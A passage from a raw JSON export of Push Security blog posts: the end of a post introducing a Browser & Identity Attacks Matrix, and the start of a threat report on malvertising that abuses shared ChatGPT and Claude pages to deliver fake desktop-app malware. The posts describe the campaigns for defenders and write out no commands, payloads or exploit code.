Tycoon are adding authorization-focused options alongside their existing credential-harvesting capabilities, which points toward multi-technique platforms where operators pick the right tool for whatever defenses the target has in place.",{"data":7527,"content":7528,"nodeType":1036},{},[7529],{"data":7530,"marks":7531,"value":7533,"nodeType":883},{},[7532],{"type":916},"Malicious and hacked browser extensions are one of the fastest growing threats",{"data":7535,"content":7536,"nodeType":879},{},[7537,7541,7548],{"data":7538,"marks":7539,"value":7540,"nodeType":883},{},[],"Malicious browser extensions have matured from an occasional nuisance into a scalable supply chain attack vector. The ",{"data":7542,"content":7543,"nodeType":940},{"uri":1440},[7544],{"data":7545,"marks":7546,"value":7547,"nodeType":883},{},[],"Cyberhaven compromise",{"data":7549,"marks":7550,"value":7551,"nodeType":883},{},[]," in December 2024 — where approximately 35 extensions were weaponized through a single OAuth phishing campaign targeting developers — impacted 2.6 million users and demonstrated that extension supply chain attacks can achieve the kind of reach that used to require a compromised software update server.",{"data":7553,"content":7554,"nodeType":879},{},[7555],{"data":7556,"marks":7557,"value":7558,"nodeType":883},{},[],"Since Cyberhaven, the pace has only accelerated. In 2026 alone, researchers have publicly disclosed at least 250 confirmed malicious browser extensions affecting roughly 1.75 million users, alongside a further 370+ extensions engaged in undisclosed or policy-disclosed data harvesting affecting an additional 44 million users. That doesn't count the extensions from late-2025 campaigns (DarkSpectre, AITOPIA, Trust Wallet) whose impacts carried into 2026.",{"data":7560,"content":7561,"nodeType":879},{},[7562,7566,7574],{"data":7563,"marks":7564,"value":7565,"nodeType":883},{},[],"The attack paths have also expanded. Beyond phishing developers for take over Web Store accounts (the Cyberhaven playbook), attackers are buying existing extensions from developers, waiting for ownership transfers or abandonments to take over, and increasingly vibe-coding their own functional extensions from scratch to build an audience that can later be weaponized. The common thread is that ",{"data":7567,"content":7568,"nodeType":940},{"uri":1440},[7569],{"data":7570,"marks":7571,"value":7573,"nodeType":883},{},[7572],{"type":948},"most malicious extensions didn't start out malicious",{"data":7575,"marks":7576,"value":7577,"nodeType":883},{},[]," — they started as legitimate tools and were turned into weapons after the fact.",{"data":7579,"content":7580,"nodeType":879},{},[7581],{"data":7582,"marks":7583,"value":7584,"nodeType":883},{},[],"None of this is happening in isolation. The threat landscape has reoriented around browser-based initial access and identity compromise — and the matrix needed to catch up.",{"data":7586,"content":7587,"nodeType":905},{},[],{"data":7589,"content":7590,"nodeType":909},{},[7591],{"data":7592,"marks":7593,"value":7595,"nodeType":883},{},[7594],{"type":916},"The evolution is playing out in public breaches",{"data":7597,"content":7598,"nodeType":879},{},[7599],{"data":7600,"marks":7601,"value":7602,"nodeType":883},{},[],"It’s worth reinforcing that when the SaaS matrix was first released, many of these attacks hadn’t been seen in the wild. The change today is staggering:",{"data":7604,"content":7605,"nodeType":1531},{},[7606,7627,7649,7669],{"data":7607,"content":7608,"nodeType":1535},{},[7609],{"data":7610,"content":7611,"nodeType":879},{},[7612,7616,7623],{"data":7613,"marks":7614,"value":7615,"nodeType":883},{},[],"When ",{"data":7617,"content":7619,"nodeType":940},{"uri":7618},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-lapsus-hunters\u002F",[7620],{"data":7621,"marks":7622,"value":2006,"nodeType":883},{},[],{"data":7624,"marks":7625,"value":7626,"nodeType":883},{},[]," compromised over a thousand organizations' Salesforce tenants through device code phishing, the attack started with a phone call, moved through a browser-based authorization flow for the attacker’s app, and ended with mass data exfiltration via API.",{"data":7628,"content":7629,"nodeType":1535},{},[7630],{"data":7631,"content":7632,"nodeType":879},{},[7633,7637,7645],{"data":7634,"marks":7635,"value":7636,"nodeType":883},{},[],"When the same collective launched ",{"data":7638,"content":7640,"nodeType":940},{"uri":7639},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-latest-slh-campaign\u002F",[7641],{"data":7642,"marks":7643,"value":7644,"nodeType":883},{},[],"AiTM phishing campaigns",{"data":7646,"marks":7647,"value":7648,"nodeType":883},{},[]," targeting Okta and Entra SSO, the phishing page was operated by a human in real time and delivered over a voice call — not email.",{"data":7650,"content":7651,"nodeType":1535},{},[7652],{"data":7653,"content":7654,"nodeType":879},{},[7655,7658,7665],{"data":7656,"marks":7657,"value":7615,"nodeType":883},{},[],{"data":7659,"content":7660,"nodeType":940},{"uri":1331},[7661],{"data":7662,"marks":7663,"value":7664,"nodeType":883},{},[],"APT29 deployed ConsentFix",{"data":7666,"marks":7667,"value":7668,"nodeType":883},{},[]," across dozens of compromised websites, the entire attack chain was browser-native, abusing a legitimate Microsoft OAuth flow to bypass MFA without proxying a single credential.",{"data":7670,"content":7671,"nodeType":1535},{},[7672],{"data":7673,"content":7674,"nodeType":879},{},[7675,7678,7686],{"data":7676,"marks":7677,"value":3786,"nodeType":883},{},[],{"data":7679,"content":7681,"nodeType":940},{"uri":7680},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fidentity-attacks-in-the-wild\u002F#id-snowflake-june-2024",[7682],{"data":7683,"marks":7684,"value":7685,"nodeType":883},{},[],"Snowflake breach",{"data":7687,"marks":7688,"value":7689,"nodeType":883},{},[]," — arguably the most consequential credential-based campaign of the past several years — saw 165 organizations breached using credentials that had been sitting in infostealer dumps for years, replayed against Snowflake tenants that lacked mandatory MFA. The attack surface wasn't Snowflake's application logic; it was the identity hygiene gap that every organization carries across hundreds of apps.",{"data":7691,"content":7692,"nodeType":879},{},[7693],{"data":7694,"marks":7695,"value":7696,"nodeType":883},{},[],"And that’s just the big picture. Every month we’re tracking new public breaches involving browser and identity TTPs — which again, are just the tip of the iceberg when you consider that many breaches are settled quietly without hitting the headlines. ",{"data":7698,"content":7699,"nodeType":879},{},[7700,7704,7709],{"data":7701,"marks":7702,"value":7703,"nodeType":883},{},[],"One of the key drivers here is the shrinking time-to-exploit. CrowdStrike's average e-crime breakout time is down to ",{"data":7705,"marks":7706,"value":7708,"nodeType":883},{},[7707],{"type":916},"29 minutes",{"data":7710,"marks":7711,"value":7712,"nodeType":883},{},[],", with the fastest recorded at 27 seconds. When attackers can move from initial access to data exfiltration within minutes, the window for post-compromise detection collapses to near zero. The best chance of stopping the attack is at the point of initial access before the identity is compromised.",{"data":7714,"content":7715,"nodeType":905},{},[],{"data":7717,"content":7718,"nodeType":909},{},[7719,7724,7730,7735,7741],{"data":7720,"marks":7721,"value":7723,"nodeType":883},{},[7722],{"type":916},"Sidenote: why we're looking at attacks ",{"data":7725,"marks":7726,"value":7729,"nodeType":883},{},[7727,7728],{"type":891},{"type":916},"in",{"data":7731,"marks":7732,"value":7734,"nodeType":883},{},[7733],{"type":916}," the browser, not ",{"data":7736,"marks":7737,"value":7740,"nodeType":883},{},[7738,7739],{"type":891},{"type":916},"on",{"data":7742,"marks":7743,"value":7745,"nodeType":883},{},[7744],{"type":916}," the browser",{"data":7747,"content":7748,"nodeType":879},{},[7749,7753,7761],{"data":7750,"marks":7751,"value":7752,"nodeType":883},{},[],"Calling this a \"browser attacks\" matrix needs clarification. We're not talking about browser exploits — RCE vulnerabilities, sandbox escapes, memory corruption bugs. Those attacks target the browser itself, they're extraordinarily expensive to develop, and they're increasingly rare. Browser zero-days hit a ",{"data":7754,"content":7756,"nodeType":940},{"uri":7755},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002F2025-zero-day-review",[7757],{"data":7758,"marks":7759,"value":7760,"nodeType":883},{},[],"historic low of 9%",{"data":7762,"marks":7763,"value":7764,"nodeType":883},{},[]," of all zero-days reported to Google, and a Chrome RCE commands a $250,000 bug bounty.",{"data":7766,"content":7767,"nodeType":879},{},[7768],{"data":7769,"marks":7770,"value":7771,"nodeType":883},{},[],"In comparison, a one-year phishing kit rental costs $1,000. A bulk stolen credential list costs $15. An initial-access-broker-provided IdP admin account costs $3,000. When it costs orders of magnitude less to exploit the person using the browser than to exploit the browser itself, attackers will take the cheaper option every time.",{"data":7773,"content":7774,"nodeType":879},{},[7775],{"data":7776,"marks":7777,"value":7778,"nodeType":883},{},[],"It's worth heading off the obvious counterargument: won't AI-assisted vulnerability discovery eventually make browser exploits cheaper? Perhaps — but it will simultaneously make them easier for browser vendors to find and patch, and vendors like Google and Microsoft have the engineering capacity and financial incentive to scale AI-driven remediation far faster than attackers can scale exploit development.",{"data":7780,"content":7781,"nodeType":905},{},[],{"data":7783,"content":7784,"nodeType":909},{},[7785],{"data":7786,"marks":7787,"value":7789,"nodeType":883},{},[7788],{"type":916},"What hasn't changed",{"data":7791,"content":7792,"nodeType":879},{},[7793,7797,7805],{"data":7794,"marks":7795,"value":7796,"nodeType":883},{},[],"The matrix remains open-source, community-maintained, and available on ",{"data":7798,"content":7800,"nodeType":940},{"uri":7799},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks",[7801],{"data":7802,"marks":7803,"value":7804,"nodeType":883},{},[],"GitHub",{"data":7806,"marks":7807,"value":7808,"nodeType":883},{},[],". The goal is the same as it was in 2023: to give offensive and defensive security teams a shared reference point for the techniques that matter most.",{"data":7810,"content":7811,"nodeType":879},{},[7812],{"data":7813,"marks":7814,"value":7815,"nodeType":883},{},[],"We built it because there was a gap in how the industry talked about these techniques, and that gap still exists — MITRE ATT&CK remains essential for endpoint and network TTPs, but the browser-based, identity-first techniques behind most modern breaches are still underrepresented in traditional frameworks.",{"data":7817,"content":7818,"nodeType":879},{},[7819],{"data":7820,"marks":7821,"value":7822,"nodeType":883},{},[],"We continue to maintain the matrix with input from red teams, detection engineers, and threat researchers across the community. Some of the most valuable additions over the past two years have come from practitioners who encountered a technique on an engagement or in an investigation and contributed it back to the repository.",{"data":7824,"content":7825,"nodeType":879},{},[7826,7830,7837],{"data":7827,"marks":7828,"value":7829,"nodeType":883},{},[],"If you're an offensive security professional using these techniques on engagements, or a defender building detections against them, we want to hear from you. Submit a PR, open a discussion, or flag a technique we've missed on ",{"data":7831,"content":7833,"nodeType":940},{"uri":7832},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fbrowser-identity-attacks-matrix",[7834],{"data":7835,"marks":7836,"value":7804,"nodeType":883},{},[],{"data":7838,"marks":7839,"value":1350,"nodeType":883},{},[],{"data":7841,"content":7842,"nodeType":905},{},[],{"data":7844,"content":7845,"nodeType":909},{},[7846],{"data":7847,"marks":7848,"value":7850,"nodeType":883},{},[7849],{"type":916},"Looking ahead",{"data":7852,"content":7853,"nodeType":879},{},[7854],{"data":7855,"marks":7856,"value":7857,"nodeType":883},{},[],"The pace of attacker innovation in browser-based initial access techniques over the past 18 months has been unlike anything we've tracked before — technique after technique moving from research curiosity to industrialized criminal tooling within months, not years.",{"data":7859,"content":7860,"nodeType":1531},{},[7861,7871,7881],{"data":7862,"content":7863,"nodeType":1535},{},[7864],{"data":7865,"content":7866,"nodeType":879},{},[7867],{"data":7868,"marks":7869,"value":7870,"nodeType":883},{},[],"AiTM platforms are adding authorization-based attack options alongside their credential-harvesting capabilities.",{"data":7872,"content":7873,"nodeType":1535},{},[7874],{"data":7875,"content":7876,"nodeType":879},{},[7877],{"data":7878,"marks":7879,"value":7880,"nodeType":883},{},[],"ClickFix has spawned fully browser-native variants.",{"data":7882,"content":7883,"nodeType":1535},{},[7884],{"data":7885,"content":7886,"nodeType":879},{},[7887],{"data":7888,"marks":7889,"value":7890,"nodeType":883},{},[],"AI is lowering the cost of producing convincing social engineering and phishing infrastructure at scale.",{"data":7892,"content":7893,"nodeType":879},{},[7894],{"data":7895,"marks":7896,"value":7897,"nodeType":883},{},[],"We don't see any of this slowing down, and that's exactly why thinking about these attacks as a browser problem instead of siloing them across email, endpoint, network, and cloud categories, each with a partial view of the picture (and still missing the whole when combined).",{"data":7899,"content":7900,"nodeType":879},{},[7901,7905,7912],{"data":7902,"marks":7903,"value":7904,"nodeType":883},{},[],"The Browser & Identity Attacks Matrix is our contribution to keeping that shared understanding current. You can ",{"data":7906,"content":7907,"nodeType":940},{"uri":7182},[7908],{"data":7909,"marks":7910,"value":7911,"nodeType":883},{},[],"explore the matrix here",{"data":7913,"marks":7914,"value":1350,"nodeType":883},{},[],{"data":7916,"content":7917,"nodeType":879},{},[7918,7922,7930],{"data":7919,"marks":7920,"value":7921,"nodeType":883},{},[],"You can also read our recent ",{"data":7923,"content":7925,"nodeType":940},{"uri":7924},"https:\u002F\u002Fpushsecurity.com\u002Fthank-you\u002Fbrowser-attacks-report",[7926],{"data":7927,"marks":7928,"value":7929,"nodeType":883},{},[],"browser attack techniques report",{"data":7931,"marks":7932,"value":7933,"nodeType":883},{},[]," for more information.",{"data":7935,"content":7939,"nodeType":971},{"target":7936},{"sys":7937},{"id":7938,"type":976,"linkType":977},"1hx6sxpyEzxn4F4jc1RGQi",[],{"data":7941,"content":7942,"nodeType":905},{},[],{"data":7944,"content":7945,"nodeType":879},{},[7946],{"data":7947,"marks":7948,"value":7949,"nodeType":883},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required. Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",{"data":7951,"content":7952,"nodeType":879},{},[7953,7956,7962],{"data":7954,"marks":7955,"value":6671,"nodeType":883},{},[],{"data":7957,"content":7958,"nodeType":940},{"uri":4772},[7959],{"data":7960,"marks":7961,"value":6679,"nodeType":883},{},[],{"data":7963,"marks":7964,"value":6683,"nodeType":883},{},[],"Introducing the Browser & Identity Attacks Matrix","We're re-releasing the SaaS attack matrix as the Browser & Identity Attacks Matrix. Here's why we've decided to make the change and what it means.","2026-05-08T00:00:00.000Z","introducing-the-browser-and-identity-attacks-matrix",{"items":7970},[7971,7973],{"sys":7972,"name":3273},{"id":3272},{"sys":7974,"name":343},{"id":3276},{"items":7976},[7977],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":7978},{"url":872},"blog\u002Fbrowser-threat-landscape-mid-year-update-2026",{"json":7981},{"data":7982,"content":7983,"nodeType":875},{},[7984],{"data":7985,"content":7986,"nodeType":879},{},[7987],{"data":7988,"marks":7989,"value":3265,"nodeType":883},{},[],{"id":1969,"publishedAt":7991},"2026-08-26T11:56:53.261Z",{"items":7993},[7994,7996],{"sys":7995,"name":3273},{"id":3272},{"sys":7997,"name":343},{"id":3276},{"items":7999},[8000,8002,8004,8006,8008,8010,8012,8014,8016,8018,8020,8022,8024,8026,8028,8030,8032,8034,8036,8038,8040,8042,8044,8046,8048],{"sys":8001,"name":244,"slug":245,"tier":45},{"id":241},{"sys":8003,"name":530,"slug":531,"tier":45},{"id":527},{"sys":8005,"name":433,"slug":434,"tier":45},{"id":430},{"sys":8007,"name":271,"slug":272,"tier":45},{"id":268},{"sys":8009,"name":539,"slug":540,"tier":45},{"id":536},{"sys":8011,"name":650,"slug":651,"tier":45},{"id":647},{"sys":8013,"name":607,"slug":608,"tier":45},{"id":604},{"sys":8015,"name":450,"slug":451,"tier":45},{"id":447},{"sys":8017,"name":424,"slug":425,"tier":45},{"id":421},{"sys":8019,"name":406,"slug":407,"tier":45},{"id":403},{"sys":8021,"name":573,"slug":574,"tier":45},{"id":570},{"sys":8023,"name":495,"slug":496,"tier":45},{"id":492},{"sys":8025,"name":468,"slug":469,"tier":45},{"id":465},{"sys":8027,"name":442,"slug":443,"tier":45},{"id":439},{"sys":8029,"name":564,"slug":565,"tier":45},{"id":561},{"sys":8031,"name":361,"slug":362,"tier":45},{"id":358},{"sys":8033,"name":477,"slug":478,"tier":45},{"id":474},{"sys":8035,"name":512,"slug":513,"tier":45},{"id":509},{"sys":8037,"name":325,"slug":326,"tier":45},{"id":322},{"sys":8039,"name":316,"slug":317,"tier":45},{"id":313},{"sys":8041,"name":262,"slug":263,"tier":45},{"id":259},{"sys":8043,"name":641,"slug":642,"tier":31},{"id":638},{"sys":8045,"name":521,"slug":522,"tier":31},{"id":518},{"sys":8047,"name":547,"slug":548,"tier":31},{"id":544},{"sys":8049,"name":280,"slug":281,"tier":31},{"id":277},"s-m4f3m6SWAIErhOTXNAHECtIUwlHBoZ_uFaPQsee20",{"id":8052,"title":8053,"authorsCollection":8054,"content":8062,"extension":228,"faqItemsCollection":8977,"faqTitle":59,"featured":6,"hashTags":59,"meta":8979,"metaTitle":8980,"ogImage":59,"postType":8981,"publishedDate":8982,"relatedBlogPostsCollection":8983,"slug":12645,"stem":12646,"subtitle":59,"summary":12647,"synopsis":12658,"sys":12659,"tagsCollection":12662,"topicsCollection":12668,"__hash__":12694},"blog\u002Fblog\u002Fllmshare-malvertising-campaign.json","LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms",{"items":8055},[8056],{"fullName":8057,"firstName":8058,"jobTitle":8059,"socialLinks":59,"profilePicture":8060},"Keanu Maharaj","Keanu","Senior Security Researcher",{"url":8061},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FVCGOm62jiocjwngWTh32U\u002Fe9a30637b1c76bf988d2fec90f5b6c36\u002F1689361049351_1.png",{"json":8063,"links":8852},{"data":8064,"content":8065,"nodeType":875},{},[8066,8073,8080,8111,8118,8124,8130,8142,8145,8153,8169,8176,8182,8189,8196,8202,8205,8213,8220,8226,8232,8239,8246,8264,8270,8273,8281,8299,8305,8312,8315,8323,8330,8337,8343,8349,8392,8399,8402,8410,8417,8424,8467,8474,8505,8512,8555,8562,8565,8573,8592,8599,8607,8622,8629,8648,8655,8658,8664,8670,8686,8689,8697,8716,8723,8846],{"data":8067,"content":8068,"nodeType":879},{},[8069],{"data":8070,"marks":8071,"value":8072,"nodeType":883},{},[],"Shared conversations on AI chatbot platforms have become the latest delivery mechanism for malware campaigns targeting macOS and Windows users. Attackers create content on platforms like ChatGPT and Claude that appears to offer installation guidance or service updates, then drive traffic to it via search engine results in the form of malvertising and SEO poisoning.  ",{"data":8074,"content":8075,"nodeType":879},{},[8076],{"data":8077,"marks":8078,"value":8079,"nodeType":883},{},[],"The content lives on chatgpt.com or claude.ai — domains that users and security tools trust implicitly — so the attack bypasses URL reputation checks before the victim even reaches the malicious payload.",{"data":8081,"content":8082,"nodeType":879},{},[8083,8087,8095,8099,8107],{"data":8084,"marks":8085,"value":8086,"nodeType":883},{},[],"Several variants of this technique have been ",{"data":8088,"content":8090,"nodeType":940},{"uri":8089},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-abuse-google-ads-claudeai-chats-to-push-mac-malware\u002F",[8091],{"data":8092,"marks":8093,"value":8094,"nodeType":883},{},[],"reported over the past few months",{"data":8096,"marks":8097,"value":8098,"nodeType":883},{},[],". The earliest examples used shared Claude.ai conversations disguised as installation guides — complete with fake \"Apple Support\" attribution — that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer. ",{"data":8100,"content":8102,"nodeType":940},{"uri":8101},"https:\u002F\u002Fwww.kaspersky.com\u002Fblog\u002Fshare-chatgpt-chat-clickfix-macos-amos-infostealer\u002F54928\u002F",[8103],{"data":8104,"marks":8105,"value":8106,"nodeType":883},{},[],"Kaspersky documented a parallel campaign",{"data":8108,"marks":8109,"value":8110,"nodeType":883},{},[]," using shared ChatGPT conversations to deliver the AMOS (Atomic macOS Stealer) via the same paste-this-command social engineering pattern. ",{"data":8112,"content":8113,"nodeType":879},{},[8114],{"data":8115,"marks":8116,"value":8117,"nodeType":883},{},[],"Push has detected a new variant that goes beyond the previously reported technique of embedding terminal commands in shared conversations: the attacker has used ChatGPT's code rendering feature to build a fully designed fake page that mimics a ChatGPT service disruption, redirecting victims to a convincing clone of ChatGPT's download page that delivers a malicious executable. ",{"data":8119,"content":8123,"nodeType":971},{"target":8120},{"sys":8121},{"id":8122,"type":976,"linkType":977},"5lz9zt223pecGvdaqdvSTQ",[],{"data":8125,"content":8129,"nodeType":971},{"target":8126},{"sys":8127},{"id":8128,"type":976,"linkType":977},"51GomAj3VOjnbmgd1DWYu0",[],{"data":8131,"content":8132,"nodeType":879},{},[8133,8138],{"data":8134,"marks":8135,"value":8137,"nodeType":883},{},[8136],{"type":916},"This is a live campaign which is still generating detections across our customer base at the time of writing. ",{"data":8139,"marks":8140,"value":8141,"nodeType":883},{},[],"Push customers are already protected and do not need to take further action. The malicious page URLs can be found at the end of this report but are not exhaustive and are liable to change. ",{"data":8143,"content":8144,"nodeType":905},{},[],{"data":8146,"content":8147,"nodeType":909},{},[8148],{"data":8149,"marks":8150,"value":8152,"nodeType":883},{},[8151],{"type":916},"A fake page, not a fake conversation",{"data":8154,"content":8155,"nodeType":879},{},[8156,8160,8165],{"data":8157,"marks":8158,"value":8159,"nodeType":883},{},[],"Previously reported variants relied on shared ",{"data":8161,"marks":8162,"value":8164,"nodeType":883},{},[8163],{"type":891},"conversations",{"data":8166,"marks":8167,"value":8168,"nodeType":883},{},[]," — the attacker created a chat that contained step-by-step instructions for the victim to follow, typically involving pasting a command into their terminal. The social engineering was conversational: the \"AI assistant\" appeared to be helpfully guiding the user through an installation process.",{"data":8170,"content":8171,"nodeType":879},{},[8172],{"data":8173,"marks":8174,"value":8175,"nodeType":883},{},[],"But now, rather than a shared conversation, the attacker has used ChatGPT's code rendering feature to create a fully designed, self-contained web page hosted at a chatgpt.com\u002Fs\u002F URL. It renders as what appears to be a ChatGPT service disruption notice:",{"data":8177,"content":8181,"nodeType":971},{"target":8178},{"sys":8179},{"id":8180,"type":976,"linkType":977},"1O9gyQab81SnbxhQp2aa5Z",[],{"data":8183,"content":8184,"nodeType":879},{},[8185],{"data":8186,"marks":8187,"value":8188,"nodeType":883},{},[],"A professional-looking error message reads: \"We're experiencing high traffic right now. Our website is temporarily unavailable due to a large number of users. Download our desktop app to continue.\" A prominent download button sits below.",{"data":8190,"content":8191,"nodeType":879},{},[8192],{"data":8193,"marks":8194,"value":8195,"nodeType":883},{},[],"The \"Show code\" toggle at the top of the page reveals what's actually happening — the entire thing is custom HTML and CSS, authored to mimic a ChatGPT system notice, rendered using ChatGPT's code output feature. A web page inside a web page, hosted on a domain that every URL reputation system in the world considers safe.",{"data":8197,"content":8201,"nodeType":971},{"target":8198},{"sys":8199},{"id":8200,"type":976,"linkType":977},"4kQTfxB3aVH9W9BeYOuljP",[],{"data":8203,"content":8204,"nodeType":905},{},[],{"data":8206,"content":8207,"nodeType":909},{},[8208],{"data":8209,"marks":8210,"value":8212,"nodeType":883},{},[8211],{"type":916},"The download page",{"data":8214,"content":8215,"nodeType":879},{},[8216],{"data":8217,"marks":8218,"value":8219,"nodeType":883},{},[],"Clicking the download button redirects the user to openew[.]app, which presents a convincing clone of ChatGPT's official desktop application download page — complete with OpenAI branding, macOS and Windows download buttons, a Chrome extension link, and a mobile download section.",{"data":8221,"content":8225,"nodeType":971},{"target":8222},{"sys":8223},{"id":8224,"type":976,"linkType":977},"4MdFc4OB37ZihTGx506QJ6",[],{"data":8227,"content":8231,"nodeType":971},{"target":8228},{"sys":8229},{"id":8230,"type":976,"linkType":977},"LaPUy0zpIeY8s4PF2wkat",[],{"data":8233,"content":8234,"nodeType":879},{},[8235],{"data":8236,"marks":8237,"value":8238,"nodeType":883},{},[],"The site also displays differently depending on who visits it. When Push researchers examined the URL via URLScan, the scanner was redirected to a different page entirely — a generic AR\u002FVR company website with no obvious connection to ChatGPT. ",{"data":8240,"content":8241,"nodeType":879},{},[8242],{"data":8243,"marks":8244,"value":8245,"nodeType":883},{},[],"Real users in a browser see the fake download page; automated scanners and bots see something benign. This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.",{"data":8247,"content":8248,"nodeType":879},{},[8249,8253,8261],{"data":8250,"marks":8251,"value":8252,"nodeType":883},{},[],"The downloaded executable poses as \"ChatGPT for Desktop\" and is ",{"data":8254,"content":8256,"nodeType":940},{"uri":8255},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fde8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[8257],{"data":8258,"marks":8259,"value":8260,"nodeType":883},{},[],"flagged on VirusTotal",{"data":8262,"marks":8263,"value":1350,"nodeType":883},{},[],{"data":8265,"content":8269,"nodeType":971},{"target":8266},{"sys":8267},{"id":8268,"type":976,"linkType":977},"3FSbwoFJYQrcyo9uMsQIWI",[],{"data":8271,"content":8272,"nodeType":905},{},[],{"data":8274,"content":8275,"nodeType":909},{},[8276],{"data":8277,"marks":8278,"value":8280,"nodeType":883},{},[8279],{"type":916},"The Claude variant: same campaign, different platform",{"data":8282,"content":8283,"nodeType":879},{},[8284,8288,8295],{"data":8285,"marks":8286,"value":8287,"nodeType":883},{},[],"Alongside the ChatGPT rendered-page variant, Push has also detected the previously reported style of attack using shared Claude.ai conversations. These follow the pattern documented by ",{"data":8289,"content":8290,"nodeType":940},{"uri":8089},[8291],{"data":8292,"marks":8293,"value":8294,"nodeType":883},{},[],"BleepingComputer",{"data":8296,"marks":8297,"value":8298,"nodeType":883},{},[],": a shared chat disguised as a \"Claude Code on Mac\" installation guide, attributed to \"Apple Support,\" containing a curl command that downloads and executes malware.",{"data":8300,"content":8304,"nodeType":971},{"target":8301},{"sys":8302},{"id":8303,"type":976,"linkType":977},"5sWayuTsVdiLSLoS4sv2Vc",[],{"data":8306,"content":8307,"nodeType":879},{},[8308],{"data":8309,"marks":8310,"value":8311,"nodeType":883},{},[],"The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign — or at least a shared playbook — that is actively experimenting with different platforms and different social engineering approaches to find what converts best.",{"data":8313,"content":8314,"nodeType":905},{},[],{"data":8316,"content":8317,"nodeType":909},{},[8318],{"data":8319,"marks":8320,"value":8322,"nodeType":883},{},[8321],{"type":916},"Malvertising remains one of the top phishing delivery channels",{"data":8324,"content":8325,"nodeType":879},{},[8326],{"data":8327,"marks":8328,"value":8329,"nodeType":883},{},[],"Push has detected this variant across multiple customer environments, with users arriving at these shared chat URLs after searching for terms including \"chatgpt,\" \"chatgpt free,\" \"chat gpt,\" and common typos like \"chatgo,\" \"chatgot,\" and \"cvhatgpt.\" ",{"data":8331,"content":8332,"nodeType":879},{},[8333],{"data":8334,"marks":8335,"value":8336,"nodeType":883},{},[],"You can see an example of this below: it's incredibly convincing, and uses the real ChatGPT domain — so even users that are paying attention are liable to fall for it. ",{"data":8338,"content":8342,"nodeType":971},{"target":8339},{"sys":8340},{"id":8341,"type":976,"linkType":977},"1GYWOyHpZT1rdTm6IGOKu8",[],{"data":8344,"content":8348,"nodeType":971},{"target":8345},{"sys":8346},{"id":8347,"type":976,"linkType":977},"4HpFJRAZH2lbygaEk2xOnN",[],{"data":8350,"content":8351,"nodeType":879},{},[8352,8356,8364,8368,8376,8379,8388],{"data":8353,"marks":8354,"value":8355,"nodeType":883},{},[],"This fits a pattern Push has tracked extensively. ",{"data":8357,"content":8359,"nodeType":940},{"uri":8358},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fverizon-dbir-2026-review\u002F",[8360],{"data":8361,"marks":8362,"value":8363,"nodeType":883},{},[],"Search-based delivery is now the dominant channel for malware distribution",{"data":8365,"marks":8366,"value":8367,"nodeType":883},{},[]," — our own data shows that ClickFix attacks are reached via search results rather than email in 4 of 5 cases, and Push's own research into ",{"data":8369,"content":8371,"nodeType":940},{"uri":8370},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalysing-a-sophisticated-google-malvertising-attack\u002F",[8372],{"data":8373,"marks":8374,"value":8375,"nodeType":883},{},[],"malvertising campaigns impersonating brands like TradingView",{"data":8377,"marks":8378,"value":3983,"nodeType":883},{},[],{"data":8380,"content":8382,"nodeType":940},{"uri":8381},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fgoogle-search-malvertising-campaign-continues-now-impersonating-ahrefs\u002F",[8383],{"data":8384,"marks":8385,"value":8387,"nodeType":883},{},[8386],{"type":948},"Ahrefs",{"data":8389,"marks":8390,"value":8391,"nodeType":883},{},[]," has demonstrated how effectively search ads can funnel victims to malicious pages. ",{"data":8393,"content":8394,"nodeType":879},{},[8395],{"data":8396,"marks":8397,"value":8398,"nodeType":883},{},[],"The shared-chat technique adds a new dimension: the destination URL itself is genuine (chatgpt.com, claude.ai), which means even a cautious user who checks the URL before clicking will see nothing suspicious.",{"data":8400,"content":8401,"nodeType":905},{},[],{"data":8403,"content":8404,"nodeType":909},{},[8405],{"data":8406,"marks":8407,"value":8409,"nodeType":883},{},[8408],{"type":916},"Legitimate platform abuse is everywhere",{"data":8411,"content":8412,"nodeType":879},{},[8413],{"data":8414,"marks":8415,"value":8416,"nodeType":883},{},[],"This is one example of a much broader pattern that has become one of the defining characteristics of the 2026 threat landscape: attackers systematically abusing legitimate platforms as attack infrastructure. The scale and variety of this abuse in recent months alone is striking, and it spans every stage of the phishing chain.",{"data":8418,"content":8419,"nodeType":1036},{},[8420],{"data":8421,"marks":8422,"value":8423,"nodeType":883},{},[],"Legit platform abuse for delivery",{"data":8425,"content":8426,"nodeType":879},{},[8427,8431,8439,8443,8451,8455,8463],{"data":8428,"marks":8429,"value":8430,"nodeType":883},{},[],"On the delivery side, attackers have been ",{"data":8432,"content":8434,"nodeType":940},{"uri":8433},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Famazon-ses-increasingly-abused-in-phishing-to-evade-detection\u002F",[8435],{"data":8436,"marks":8437,"value":8438,"nodeType":883},{},[],"weaponizing stolen AWS credentials to send phishing through Amazon SES",{"data":8440,"marks":8441,"value":8442,"nodeType":883},{},[]," that passes SPF, DKIM, and DMARC validation because SES is a legitimate Amazon service. A Vietnamese operation dubbed 